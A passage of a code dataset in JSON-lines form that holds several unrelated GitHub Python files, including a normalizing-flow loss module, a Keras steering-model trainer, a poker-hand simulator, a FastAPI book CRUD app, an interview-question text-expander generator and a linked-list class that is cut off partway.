self.prior.log_prob(z)\n x, log_R_zx = self.g(z)\n return z.detach().numpy() , x.detach().numpy()\n\n def loss(self, batch, w_ml = 1.0, w_kl = 0.0, w_rc = 0.0):\n return w_ml*self.loss_ml(batch) + w_kl*self.loss_kl(batch) + w_rc*self.loss_rc(batch)\n\n def loss_ml(self, batch):\n z, log_R_xz = self.f(batch)\n self.energies = self.calculate_energy(batch)\n return self.expected_value(0.5*torch.norm(z,dim=1)**2 - log_R_xz)\n\n def loss_kl(self, batch_z):\n x, log_R_zx = self.g(batch_z)\n self.energies = self.calculate_energy(x)\n return self.expected_value(self.energies - log_R_zx)\n\n def loss_kl_ising(self, batch_z):\n x, log_R_zx = self.g(batch_z)\n self.energies = self.calculate_energy(torch.sign(x))\n return self.expected_value(self.energies - log_R_zx)\n\n def calculate_energy(self, batch):\n energies = batch.new_zeros(batch.shape[0])\n\n e_high = 10**4\n for i in range(batch.shape[0]): # for each x in the batch\n config = batch[i,:].reshape(self.orig_dimension) # reshape into correct form\n energies[i] = self.system.energy(config)\n if abs(energies[i]) == float('inf'):\n print(\"energy overflow detected\")\n elif energies[i] > e_high:\n energies[i] = e_high + torch.log(energies[i] - e_high + 1.0)\n\n self.weights = torch.exp(-energies*0.0) # simple average\n return energies\n\n def expected_value(self, observable):\n return torch.dot(observable,self.weights)/torch.sum(self.weights)\n","repo_name":"jbinagia/CS-230-Final-Project","sub_path":"project/networks/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"26436788768","text":"import re\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.stats as stats\n\nLOG_PATH = \"../logs/72rs__.txt\"\n\nrs = []\ndics = []\nd = open(LOG_PATH, \"r\").read().splitlines() + open(\"../logs/72rs_.txt\", \"r\").read().splitlines()\nfor l in d:\n if 'R: 0.' 
in l:\n r = float(l.split(\": \")[1])\n rs.append(r)\n if 'DIC' in l:\n dic = float(l.split(\": \")[1])\n dics.append(dic)\n#print(dics)\n#rs = dics\nprint(len(rs))\nrs_shuffle = rs[:-2]\nallo_r = rs[-2]\nego_r = rs[-1]\n\ncounts, bins = np.histogram(rs_shuffle, bins=20)\nplt.hist(bins[:-1], bins, weights=counts / max(counts))\ng = stats.norm.pdf(bins, np.mean(rs_shuffle), np.std(rs_shuffle))\ng /= max(g)\nplt.plot(bins, g)\n\n#plt.show()\n#h = plt.hist(rs_shuffle, bins=30)[0]\nplt.plot([allo_r, allo_r], [0, plt.gca().get_ylim()[1]])\n\nz = stats.zscore(rs)[-2] # allo z-score\np_val = 1-stats.norm.cdf(z)\nplt.title(f\"Z-score: {z:.3}; p_value {p_val:.4}\")\nplt.savefig(f'C:/tmp/cosyne-figs/72_shuffles.pdf', bbox_inches='tight', dpi=300) \nplt.show()","repo_name":"1tux/neural-analysis","sub_path":"scripts/analyze_logs_cosyne.py","file_name":"analyze_logs_cosyne.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29626125394","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Lambda, ELU\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.optimizers import Adam \nfrom keras.models import model_from_json\nfrom itertools import zip_longest\nimport cv2\nimport numpy as np\nimport csv, argparse\nimport os, errno\nimport matplotlib.pyplot as plt\n\ndef file_len(fname):\n i = -1\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return i + 1\n\ndef remove(filename):\n try:\n os.remove(filename)\n except OSError as e:\n if e.errno != errno.ENOENT:\n raise\n \ndef load_driving_logs(logs, path):\n f = []\n y = []\n for d in logs:\n log = d+'driving_log.csv'\n with open(log,'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n imgc_file = path + d + row[0].strip()\n imgl_file = path + d + row[1].strip()\n imgr_file = path + d + row[2].strip()\n if (os.path.isfile(imgc_file) & os.path.isfile(imgl_file) & os.path.isfile(imgr_file)):\n f.append(imgc_file)\n y.append(np.float32(row[3]))\n f.append(imgl_file)\n y.append(np.float32(row[3])+0.2)\n f.append(imgr_file)\n y.append(np.float32(row[3])-0.2)\n return f, y\n \ndef split_driving_log(f, y, train_percent, seed=1973):\n ft = []\n yt = []\n fv = []\n yv = []\n np.random.seed(seed)\n for idx, img in enumerate(f):\n if (np.random.random() <= train_percent):\n ft.append(img)\n yt.append(y[idx])\n else:\n fv.append(img)\n yv.append(y[idx])\n return ft, yt, fv, yv\n\ndef grouper(iterable, n, fillvalue=None):\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\ndef load_image(f):\n img = cv2.imread(f,-1)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n return img \n \ndef extract_csv(log):\n f = []\n y = []\n with open(log,'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n f.append(row[0].strip())\n y.append(np.float32(row[3]))\n f.append(row[1].strip())\n y.append(np.float32(row[3])+0.2)\n f.append(row[2].strip())\n y.append(np.float32(row[3])-0.2)\n return f, y\n\ndef gamma_correction(img, correction):\n img = img/255.0\n img = cv2.pow(img, correction)\n return np.uint8(img*255)\n\ndef preprocess_image(img):\n img = img[60:140,:,:]\n img = cv2.resize(img,(64, 64))\n return(img)\n \n \ndef bin_data(f, y, bins):\n fb = {}\n yb = {}\n for idx, img in enumerate(f):\n bin = str((i for i,v in enumerate(bins) if v >= y[idx]).__next__())\n if bin in fb:\n 
fb[bin].append(img)\n yb[bin].append(y[idx])\n else:\n fb[bin] = [img]\n yb[bin] = [y[idx]]\n return fb, yb\n \n \ndef generate_balanced(fb, yb, n):\n while True:\n xs = []\n ys = []\n for _ in range(n):\n bin = np.random.randint(low=1, high=8)\n l = len(fb[str(bin)])\n i = np.random.randint(low=0,high=l)\n img, angle = generate_image(load_image(fb[str(bin)][i]),yb[str(bin)][i])\n xs.append(img)\n ys.append(angle)\n yield (np.asarray(xs), np.asarray(ys))\n \n \ndef generate_image(img, y):\n \n angle = y\n\n X_OFFSET_RANGE = 10\n Y_OFFSET_RANGE = 10\n X_OFFSET_ANGLE = 0.2\n \n img = preprocess_image(img)\n \n bright_factor = 0.2 + (3.8 * np.random.uniform())\n img = gamma_correction(img, bright_factor)\n\n if (np.random.uniform() > 1.0):\n img = np.fliplr(img)\n angle = -1.0 * angle\n\n x_translation = (X_OFFSET_RANGE * np.random.uniform()) - (X_OFFSET_RANGE / 2)\n y_translation = (Y_OFFSET_RANGE * np.random.uniform()) - (Y_OFFSET_RANGE / 2)\n\n angle = angle + ((x_translation / X_OFFSET_RANGE) * 2) * X_OFFSET_ANGLE\n t = np.float32([[1, 0, x_translation], [0, 1, y_translation]])\n img = cv2.warpAffine(img, t, (img.shape[1], img.shape[0]))\n\n return (img, angle)\n\n \ndef generator_random_zero(n, img_dir, logfile):\n f, y = extract_csv(logfile)\n l = len(f)\n while True:\n xs = []\n ys = []\n for _ in range(n):\n i = np.random.randint(low=0,high=l)\n if ( (np.float32(y[i]) >= -0.01 \n and np.float32(y[i]) <= 0.01 ) \n and np.random.uniform() > 0.1 ):\n while (np.float32(y[i]) >= -0.01 \n and np.float32(y[i]) <= 0.01):\n i = np.random.randint(low=0,high=l)\n elif ( (np.float32(y[i]) >= -0.21 \n and np.float32(y[i]) <= -0.19 ) \n and np.random.uniform() > 0.1 ):\n while (np.float32(y[i]) >= -0.21 \n and np.float32(y[i]) <= -0.19):\n i = np.random.randint(low=0,high=l)\n elif ( (np.float32(y[i]) >= 0.19 \n and np.float32(y[i]) <= 0.21 ) \n and np.random.uniform() > 0.1 ):\n while (np.float32(y[i]) >= 0.19 \n and np.float32(y[i]) <= 0.21):\n i = np.random.randint(low=0,high=l)\n img, angle = generate_image(load_image(img_dir+f[i]),np.float32(y[i]))\n xs.append(img)\n ys.append(y[i])\n yield (np.asarray(xs), np.asarray(ys))\n\ndef generator_all_batch(n, img_dir, logfile):\n f, y = extract_csv(logfile)\n l = len(f)\n while True:\n xs = []\n ys = []\n for i in range(0,l,n):\n xs.append(preprocess_image(load_image(img_dir+f[i])))\n ys.append(np.float32(y[i]))\n yield (np.asarray(xs), np.asarray(ys))\n\n \ndef get_model():\n ch, row, col = 3, 64, 64 \n\n model = Sequential()\n model.add(Lambda(lambda x: x/127.5 - 1.,\n input_shape=( row, col, ch),\n output_shape=( row, col, ch)))\n model.add(Convolution2D(32, 3, 3, border_mode=\"same\"))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.5))\n model.add(ELU())\n model.add(Convolution2D(64, 3, 3, border_mode=\"same\"))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.5))\n model.add(ELU())\n model.add(Convolution2D(128, 3, 3, border_mode=\"same\"))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.5)) \n model.add(ELU())\n model.add(Flatten())\n model.add(Dense(512))\n model.add(ELU())\n model.add(Dense(64))\n model.add(ELU())\n model.add(Dense(16))\n model.add(ELU())\n model.add(Dense(1))\n return model\n\n\n\nlogs = [ 'data/two-laps-middle-forward/', \n 'data/two-laps-middle-backwards/', \n 'data/two-laps-recovery-forward/']\n\nf, y = load_driving_logs(logs, '/home/mattwg/Projects/carnd-cloning-experiments/')\nfb, yb = bin_data(f, y, bins = (-999, -0.3, -0.2, -0.1, 0.1, 0.2, 0.3, 999 ))\n\nprint([ 
'bin:{}={}'.format(k,len(fb[k])) for k in sorted(fb.keys())])\nprint(sum([len(fb[k]) for k in fb.keys()]))\n\n# Just to check distributions:\ng = generate_balanced(fb, yb, 10000)\nfg, yg = g.__next__()\nplt.hist(yg, bins = 20)\n\nparser = argparse.ArgumentParser(description='Train Model')\nparser.add_argument('--model', type=str, help='Optional path to model to continue training')\nargs = parser.parse_args()\n\nif args.model:\n print('Loading model for continued training!')\n with open(args.model, 'r') as f:\n json = f.read()\n model = model_from_json(json)\nelse:\n print('Training new model!')\n model = get_model()\n\nn_train = len(f)\nprint(n_train)\n\nn_epochs = 10\nbatch_size = 50\nn_batches = 10 \n\nmodel.compile(optimizer=Adam(lr=0.00001), loss=\"mse\")\n\nif args.model:\n model.load_weights('model.h5')\n \nmodel.fit_generator(\n generate_balanced(fb, yb, batch_size),\n samples_per_epoch=n_batches,\n nb_epoch=n_epochs, verbose=1)\n\njson = model.to_json()\nwith open('model.json', 'w') as f:\n f.write(json) \nmodel.save_weights('model.h5')\n\n\n\n","repo_name":"mattwg/carnd-cloning-experiments","sub_path":"model-balanced.py","file_name":"model-balanced.py","file_ext":"py","file_size_in_byte":8226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17037229301","text":"import random\nimport time\nnumber = int(input('请输入玩家人数:'))\n\n\nA=['♥','♠','♦','♣']\nB=['3','4','5','6','7','8','9','10','J','Q','K','A','2']\npoker=[]\n\nn=1\nfor i in A:\n for j in B:\n poker.append((n,(i+j)))\n n=n+1\n#print(\"开始洗牌....\")\n#print(poker)\npokers=poker.copy( )\n\n\n\n\n#定义洗牌\ndef xipai(x):\n for i in x:\n pokers.remove(i)\n return pokers\n\n#定义发牌\ndef fapai(y):\n for i in y:\n print(i[1],',',end=\" \")\n\n\n# 牌号值进行转换\ndef zhuanhuan(hand):\n global shuzi\n global huase\n shuzi = []\n huase = []\n for i in hand:\n shuzi.append((i[0]) % 13)\n huase.append((i[0]) // 13)\n # print(huase,shuzi)\n return shuzi, huase\n\n\n# 定义五项的组合\ndef combin(nums):\n from itertools import combinations\n result = []\n for i in combinations(nums, 5):\n result.append(list(i))\n return result\n\n\n# 判断是否对子\ndef kind(n, pai):\n dui = []\n zhuanhuan(pai)\n for i in shuzi:\n shu = shuzi.count(i)\n if shu == n:\n if i in dui:\n continue\n dui.append(i)\n return dui\n\n\n# 判断牌型级别\ndef shunzi(pai):\n global jibie\n jibie = 0\n zhuanhuan(pai)\n # 判断是否是高牌\n '''\n if max(shuzi) == 13 and len(set(shuzi)) == 5:\n jibie =jibie + 10**1\n '''\n\n # 判断是否皇家同花顺\n if max(shuzi) - min(shuzi) == 4 and len(set(shuzi)) == 5 and len(set(huase)) == 1 and max(shuzi) == 12:\n jibie = 900\n return jibie\n\n # 判断是否同花顺\n elif max(shuzi) - min(shuzi) == 4 and len(set(shuzi)) == 5 and len(set(huase)) == 1 and max(shuzi) != 13:\n jibie = 800\n return jibie\n\n # 判断是否四条\n elif len(kind(4, pai)) == 1:\n jibie = 700\n return jibie\n\n # 判断是否葫芦\n elif len(kind(3, pai)) == 1 and len(kind(2, pai)) == 1:\n jibie = 600\n return jibie\n\n # 判断是否同花\n elif len(set(huase)) == 1:\n jibie = 500\n return jibie\n\n # 判断是否顺子\n elif max(shuzi) - min(shuzi) == 4 and len(set(shuzi)) == 5 and max(shuzi) != 13:\n jibie = 400\n return jibie\n\n # 判断是否三条\n elif len(kind(3, pai)) == 1:\n jibie = 300\n return jibie\n\n # 判断是否两对\n elif len(kind(2, pai)) == 2:\n jibie = 200\n return jibie\n\n # 判断是否对子\n elif len(kind(2, pai)) == 1:\n jibie = 100\n return jibie\n else:\n return jibie\n # print(jibie)\n\n\n# 判断最终牌型\ndef panduan(pai):\n type = ''\n danji = []\n for i in combin(pai):\n t = shunzi(i)\n # print(i,t)\n 
danji.append(t)\n    jibie = max(danji)\n    # print(jibie)\n    if 100 <= jibie < 200:\n        type = '对子'\n    elif 200 <= jibie < 300:\n        type = '两对'\n    elif 300 <= jibie < 400:\n        type = '三条'\n    elif 400 <= jibie < 500:\n        type = '顺子'\n    elif 500 <= jibie < 600:\n        type = '同花'\n    elif 600 <= jibie < 700:\n        type = '葫芦'\n    elif 700<= jibie < 800:\n        type = '四条'\n    elif 800 <= jibie < 900:\n        type = '同花顺'\n    elif 900 <= jibie < 1000:\n        type = '皇家同花顺'\n    else:\n        type = '普通'\n    return type\n\n#定义函数:每个人发5张牌\ndef fadipai(number):\n    #time.sleep(3)\n    global pokers\n    pokers = poker.copy( )\n    global pokername\n    random.shuffle(pokers)\n    #print(pokers)\n    #print(pokers)\n    pokername = []\n    for i in range(number):\n        pokername.append(random.sample(pokers,5))\n        pokers = xipai(pokername[i])\n        #print(\"\\n开始给player{}发牌:\".format(i+1))\n        #fapai(pokername[i])\n        pokername[i].sort()\n\ndict = {}\n#定义函数:玩家轮流查看底牌\ndef chakanpai(number):\n    fadipai(number) # 发底牌\n    #print('\\n')\n    for i in range(number):\n        print(\"player{}的牌:\".format(i+1))\n        fapai(pokername[i])\n        paixing = panduan(pokername[i])\n        print(paixing)\n        #if paixing not in dict:\n        if paixing in dict:\n            dict[paixing] = dict[paixing] + 1\n        else:\n            dict[paixing] = 1\n    #print(dict)\n    return dict\nnum = int(input('输入执行次数:'))\nfor i in range(num+1):\n    print('\\n第{}轮:'.format(i))\n    chakanpai(number)#玩家查看牌\nprint(dict)\ngailv = {}\nfor i in dict:\n    gailv[i] = str(dict[i] / (num * number) * 100) + '%'\nprint(gailv)\n","repo_name":"FrancisLi196/SUSTech-Game-2020","sub_path":"Group6\\tongji.py","file_name":"Group6\\tongji.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44061725150","text":"from django.urls import path\nfrom . import views\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nurlpatterns = [\n    path('', views.IndexPage.as_view(), name=\"load_index_page\"),\n    path('load_login_page', views.LoginPage.as_view(), name=\"load_login_page\"),\n    path('load_register_page', views.RegisterPage.as_view(), name=\"load_register_page\"),\n\n    path('register', views.UserList.as_view(), name=\"register\"),\n    path('getUserList', views.UserList.as_view(), name=\"getUserList\"),\n\n    path('login', views.LoginLogoutList.as_view(), name=\"login\"),\n    path('logout', views.LoginLogoutList.as_view(), name=\"logout\"),\n]\nurlpatterns = format_suffix_patterns(urlpatterns)\n","repo_name":"nareshkumarinbox/pyTweet","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43911873317","text":"from datetime import date\r\nfrom typing import Optional\r\n\r\nfrom fastapi import FastAPI\r\nfrom fastapi.encoders import jsonable_encoder\r\nfrom fastapi.responses import JSONResponse\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\n\r\nfrom app.models import Base, Book\r\nfrom app.settings import DATABASE_URL\r\n\r\n# DISCLAIMER:\r\n# This is a very simple CRUD API\r\n# Not intended for production\r\n\r\n\r\nengine = create_engine(DATABASE_URL)\r\nSession = sessionmaker(bind=engine)\r\n\r\n\r\ndef recreate_database():\r\n    # Base.metadata.drop_all(engine)\r\n    Base.metadata.create_all(engine)\r\n\r\n\r\nrecreate_database()\r\n\r\napp = FastAPI()\r\n\r\n\r\n@app.get(\"/\")\r\ndef root():\r\n    return {\"message\": \"Sample books API is online\"}\r\n\r\n\r\n@app.post(\"/books\")\r\ndef create_book(title: str, pages: int):\r\n
session = Session()\r\n book = Book(title=title, pages=pages, created_at=date.today())\r\n session.add(book)\r\n session.commit()\r\n session.close()\r\n\r\n return JSONResponse(\r\n status_code=200, content={\"status_code\": 200, \"message\": \"success\"}\r\n )\r\n\r\n\r\n@app.get(\"/books/{id}\")\r\ndef find_book(id: int):\r\n session = Session()\r\n book = session.query(Book).filter(Book.id == id).first()\r\n session.close()\r\n\r\n result = jsonable_encoder({\"book\": book})\r\n\r\n return JSONResponse(status_code=200, content={\"status_code\": 200, \"result\": result})\r\n\r\n\r\n@app.get(\"/books\")\r\ndef get_books(page_size: int = 10, page: int = 1):\r\n if page_size > 100 or page_size < 0:\r\n page_size = 100\r\n\r\n session = Session()\r\n books = session.query(Book).limit(page_size).offset((page - 1) * page_size).all()\r\n session.close()\r\n\r\n result = jsonable_encoder({\"books\": books})\r\n\r\n return JSONResponse(status_code=200, content={\"status_code\": 200, \"result\": result})\r\n\r\n\r\n@app.put(\"/books\")\r\ndef update_book(id: int, title: Optional[str] = None, pages: Optional[int] = None):\r\n session = Session()\r\n book = session.query(Book).get(id)\r\n if title is not None:\r\n book.title = title\r\n if pages is not None:\r\n book.pages = pages\r\n session.commit()\r\n session.close()\r\n\r\n return JSONResponse(\r\n status_code=200, content={\"status_code\": 200, \"message\": \"success\"}\r\n )\r\n\r\n\r\n@app.delete(\"/books\")\r\ndef delete_book(id: int):\r\n session = Session()\r\n book = session.query(Book).get(id)\r\n session.delete(book)\r\n session.commit()\r\n session.close()\r\n\r\n return JSONResponse(\r\n status_code=200, content={\"status_code\": 200, \"message\": \"success\"}\r\n )\r\n\r\n\r\n@app.exception_handler(Exception)\r\ndef exception_handler(request, exc):\r\n json_resp = get_default_error_response()\r\n return json_resp\r\n\r\n\r\ndef get_default_error_response(status_code=500, message=\"Internal Server Error\"):\r\n return JSONResponse(\r\n status_code=status_code,\r\n content={\"status_code\": status_code, \"message\": message},\r\n )\r\n","repo_name":"jeremyleonardo/books-crud-fastapi","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12321589321","text":"# You are given a number that contains 4 digits with at least two distinct digits. \n# Your program should perform the following routine on the number: Arrange the digits in descending order and in ascending order\n# (adding zeros to fit it to a 4-digit number), and subtract the smaller number from the bigger number.\n# Then repeat the previous step. 
Performing this routine will always cause you to reach a fixed number: 6174.\n# Your program should return the number of times this routine must be performed until 6174 is reached.\n\nnum = input(\"Input\\n\");\nasc = ''.join(sorted(num));\ndes = ''.join(sorted(num, reverse = True));\ndiff = str(abs(int(des) - int(asc))).zfill(4);\ncount = 1;\nwhile(int(diff) != 6174 and int(diff) > 0):\n asc = ''.join(sorted(diff));\n des = ''.join(sorted(diff, reverse = True));\n diff = str(abs(int(des) - int(asc))).zfill(4);\n count += 1;\nprint(\"Output:\");\nprint(count);\n\n\n'''EX1:\nInput: \n2111 \nOutput: \n5 \n\n''EX2: \nInput: \n9831 \nOutput: \n7\n\n\nFor example, if num is 3524 your program should return 3 because of the following steps:\n\n(1) 5432 - 2345 = 3087 \n(2) 8730 - 0378 = 8352 \n(3) 8532 - 2358 = 6174\n'''\n","repo_name":"MaxSoEn/IEEE-ZSB-Technical-Rookies-22","sub_path":"Task-3/problem-6.py","file_name":"problem-6.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3705419836","text":"import os\nimport sys\nimport errno\nimport random\nimport glob\nimport tkinter\nfrom tkinter import filedialog\nimport pyautogui\nimport time\nimport configparser\n\nroot = tkinter.Tk()\nroot.withdraw()\n\n#Setting current Dir\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\n#Move mouse to upper left screen to kill in case of error\npyautogui.FAILSAFE = True\n\nautokeytemplate = (\"\"\"import subprocess\nimport os\nos.chdir(\"{0}\")\nsubprocess.call(\"python randinterq.py {1}\", shell=True)\n\"\"\")\n\nautokeyjsontemplate = (\"\"\"{{\n \"type\": \"script\",\n \"description\": \"{0}\",\n \"store\": {{}},\n \"modes\": [\n 1\n ],\n \"usageCount\": 0,\n \"prompt\": false,\n \"omitTrigger\": false,\n \"showInTrayMenu\": false,\n \"abbreviation\": {{\n \"abbreviations\": [\n \"{1}\"\n ],\n \"backspace\": true,\n \"ignoreCase\": false,\n \"immediate\": false,\n \"triggerInside\": false,\n \"wordChars\": \"[^\\\\t]\"\n }},\n \"hotkey\": {{\n \"modifiers\": [],\n \"hotKey\": null\n }},\n \"filter\": {{\n \"regex\": null,\n \"isRecursive\": false\n }}\n}}\"\"\")\n\nahktemplate = (\"\"\"\n::{0}::\nSetWorkingDir, {1}\nRun %comspec% /c \"\"{2}\" \"{3}\"\",,hide\nreturn\n\"\"\")\n\nconfig = configparser.ConfigParser()\nahkpath = 'none'\nautokeypath = 'None'\nqpath = dir_path\n\n\nif os.path.isfile('config.ini'):\n config.sections()\n config.read('config.ini')\n ahkpath = config['Default']['ahkdir']\n autokeypath = config['Default']['autokeydir']\n qpath = config['Default']['qdir']\n\n\ndef createdir():\n numdir = int(input(\"Please enter the number of questions (directories) you would like: \"))\n a = 0\n while a <= numdir:\n dir_name = (\"Question %s\" % a)\n try:\n os.mkdir(dir_name)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n a = a + 1\n passfail = input(\"Would you like to create the pass/fail directories? 
(y/n): \")\n if passfail == 'y':\n try:\n os.mkdir(\"Question pass\")\n os.mkdir(\"Question fail\")\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n\ndef writerandomq():\n script, qnum = sys.argv\n os.chdir(qpath)\n #Create list of filenames\n search_path = os.path.join('Question %s' % qnum, '*.txt')\n filenames = glob.glob(search_path)\n\n #Open Random file from list\n selqfile = open(random.choice(filenames))\n qcontent = selqfile.read()\n\n #Write content of file\n pyautogui.typewrite(qcontent)\n\ndef genautokey():\n gen = input(\"\\nDo you wish to generate the python autokey files? (y/n): \")\n numq = None\n if gen == 'y':\n print(\"\\nI recommend using question 0 as the intro of your interview script.\"\n \"\\nIt will be created along with the other questions.\")\n numq = int(input(\"\\nPlease enter the number of questions you have: \"))\n a = 0\n os.chdir(autokeypath)\n while a <= numq:\n f = open(\"question%s.py\" % a, \"w\")\n f.write(autokeytemplate.format(dir_path, a))\n a = a + 1\n f.close()\n f = open(\"pass.py\", \"w\")\n f.write(autokeytemplate.format(dir_path, 'pass'))\n f.close()\n f = open(\"fail.py\", \"w\")\n f.write(autokeytemplate.format(dir_path, 'fail'))\n f.close()\n gjson = input(\"Do you wish to generate the .json files as well? (y/n): \")\n if gjson == 'y':\n if numq == None:\n numq = int(input(\"\\nPlease enter the number of questions you have: \"))\n b = 0\n os.chdir(autokeypath)\n while b <= numq:\n f = open(\".question%s.json\" % b, \"w\")\n f.write(autokeyjsontemplate.format('Question %s' % b, 'q%s'% b))\n f.close()\n b = b + 1\n f = open(\".pass.json\", \"w\")\n f.write(autokeyjsontemplate.format('pass', 'pass'))\n f.close()\n f = open(\".fail.json\", \"w\")\n f.write(autokeyjsontemplate.format('fail', 'fail'))\n f.close()\n leaving()\n else:\n leaving()\n\ndef genahk():\n numq = None\n print(\"\\nI recommend using question 0 as the intro of your interview script.\"\n \"It will be created along with the other questions.\")\n numq = int(input(\"\\nPlease enter the number of questions you have: \"))\n a = 0\n os.chdir(ahkpath)\n filename = os.path.splitext(os.path.basename(__file__))[0]\n with open(\"randinterq.ahk\", \"w\") as file:\n file.write('#Hotstring EndChars `t')\n while a <= numq:\n file.write(ahktemplate.format('q%s' % a, dir_path, '%s.exe' % filename, a))\n a = a + 1\n file.write(ahktemplate.format('pass', dir_path, '%s.exe' % filename, 'pass'))\n file.write(ahktemplate.format('fail', dir_path, '%s.exe' % filename, 'fail'))\n leaving()\n\ndef leaving():\n os.chdir(dir_path)\n config['Default'] = {}\n config['Default']['ahkdir'] = ahkpath\n config['Default']['autokeydir'] = autokeypath\n config['Default']['qdir'] = qpath\n with open('config.ini', 'w') as configfile:\n config.write(configfile)\n print(\"\\nFor normal use of this program, please pass the number of the question you would like to write\")\n print(\"For example: 'randinterq 11' will return a random selection from question 11\")\n print(\"Will exit in 5 seconds\")\n time.sleep(5)\n exit()\n\nif len(sys.argv) == 1:\n print(\"\\nWelcome to the Apollo.rip Interviewer Companion app!\")\n choosedir = input(\"\\nWould you like to change the location of the question folders? (y/n): \")\n if choosedir == 'y':\n qpath = filedialog.askdirectory(initialdir='.')\n makedir = input(\"Do you wish to make some directories to hold your question files? 
(y/n): \")\n if makedir == 'y':\n os.chdir(qpath)\n createdir()\n windows = input(\"Are you running windows and using autohotkey? (y/n): \")\n if windows == 'y':\n ahkchangedir = input(\"Do you wish to set/change where the ahk script is saved? (y/n): \")\n if ahkchangedir == 'y':\n ahkpath = filedialog.askdirectory(initialdir='.')\n startgenahk = input(\"Do you wish to create the ahk script? (y/n): \")\n if startgenahk == 'y':\n genahk()\n linux = input(\"Are you running linux and using AutoKey? (y/n): \")\n if linux == 'y':\n autochangedir = input(\"Do you wish to set/change the AutoKey directory? (y/n): \")\n if autochangedir == 'y':\n linuxrdy = input(\"\\nPress y when you are ready to set the AutoKey directory \\n \\n\"\n \"Make sure this folder was already created by AutoKey previously \\n\"\n \"otherwise press any other key to exit: \")\n if linuxrdy == 'y':\n autokeypath = filedialog.askdirectory(initialdir='.')\n genautokey()\n else:\n leaving()\n else:\n genautokey()\n# if linux == 'n':\n# leaving()\n else:\n leaving()\nelse:\n writerandomq()\n","repo_name":"toptotem/randinterq","sub_path":"randinterq.py","file_name":"randinterq.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74753859367","text":"\nRESULTS = {\n \"opt_param_file\": \"results_opt_param.csv\",\n \"opt_stats_file\": \"results_opt_stats.csv\",\n}\n\nPCD_DATA = {\n \"garage\": {\n \"name\": \"Garage\",\n \"spiral\": 'garage.pcd_spiral.dictionary',\n \"bastar\": 'garage.pcd_bastar.dictionary',\n \"sampled\": 'garage.pcd_sampled.dictionary',\n #\"new\": 'garage.pcd_new.dictionary'\n },\n \"bridge\": {\n \"name\": \"Bridge\",\n \"spiral\": 'bridge.pcd_spiral.dictionary',\n \"bastar\": 'bridge.pcd_bastar.dictionary',\n \"sampled\": 'bridge.pcd_sampled.dictionary',\n #\"new\": 'bridge.pcd_new.dictionary'\n },\n \"crossing\": {\n \"name\": \"Crossing\",\n \"spiral\": 'crossing.pcd_spiral.dictionary',\n \"bastar\": 'crossing.pcd_bastar.dictionary',\n \"sampled\": 'crossing.pcd_sampled.dictionary',\n #\"new\": 'crossing.pcd_new.dictionary'\n }\n}\n\nALGORITHM_DATA = {\n \"bastar\": {\n \"name\": \"BA*\",\n 'line': 'r',\n 'confidence_color': (1.0, 0.0, 0.0, 0.3)\n },\n \"spiral\": {\n \"name\": \"Inward Spiral\",\n 'line': 'b',\n 'confidence_color': (0.0, 0.0, 1.0, 0.3)\n },\n \"sampled\": {\n \"name\": \"Sampled BA* & Inward Spiral\",\n 'line': 'g',\n 'confidence_color': (0.0, 1.0, 0.0, 0.3)\n },\n #\"new\": {\n # \"name\": \"Random points\",\n # 'line': 'm',\n # 'confidence_color': (1.0, 0.0, 1.0, 0.3)\n #}\n}","repo_name":"danneengelson/urbanroadsweeper","sub_path":"src/urbanroadsweeper/results_config.py","file_name":"results_config.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34613221199","text":"# 单向链表\n\nclass Node(object):\n\n def __init__(self, item):\n self.item = item\n self.next = None\n\n\nclass SingleLinkList(object):\n\n def __init__(self):\n self._head = None\n # self._head.next = None # 初始化一个空节点 ()\n\n def is_empty(self):\n # 判断当前单链表是否为空, 只需判断是否存在头节点\n if self._head == None:\n return True\n return False\n\n def length(self):\n cur = self._head\n if not cur:\n return 0\n else:\n n = 1\n while cur.next != None:\n cur = cur.next\n n += 1\n return n\n\n def ergodic(self):\n if self.is_empty():\n return\n cur = self._head\n while cur.next != None:\n print(cur.item, end=' ergo ')\n cur = cur.next\n 
